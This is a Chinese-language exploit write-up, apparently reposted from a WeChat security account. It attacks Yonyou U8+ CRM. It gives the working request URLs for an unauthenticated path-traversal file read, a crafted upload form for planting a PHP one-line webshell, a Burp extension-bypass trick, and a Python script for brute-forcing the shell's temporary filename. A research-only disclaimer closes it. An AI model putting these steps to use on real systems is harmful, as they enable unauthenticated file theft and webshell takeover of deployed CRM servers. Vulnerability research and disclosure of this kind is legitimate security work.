用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞
任意文件读取
存在漏洞的文件为:
/ajax/getemaildata.php
访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt
可以看到用友版本7.2 patch2
访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
可以看到C://windows/win.ini
任意文件上传
首先构造一个文件上传的页面1.html
<html>
<form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data">
<input type="file" name="file" />
<input type="submit" name="upload" value="upload"/>
</form>
</html>
选择php一句话木马
打开burp进行抓包,在文件上传的后缀名处添加一个空格
返回的tmpfile\mht3AC8.tmp.mht
即为木马地址,访问http://IP:端口/tmpfile//mht3AC8.tmp.mht
即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php
,将前面的mht改为upd,将后面的mht改为php
抓包,将其放到爆破工具里,爆破中间的3AC8
,范围是从0000~FFFF,共65536个
生成字典的脚本如下:
with open('1.txt', 'w') as f:
for i in range(0x10000):
f.write(format(i, '04X') + 'n')
该脚本会在当前目录下生成1.txt
成功访问到马
原文始发于微信公众号(代码小铺):【实战】用友U8+ CRM任意文件上传、任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论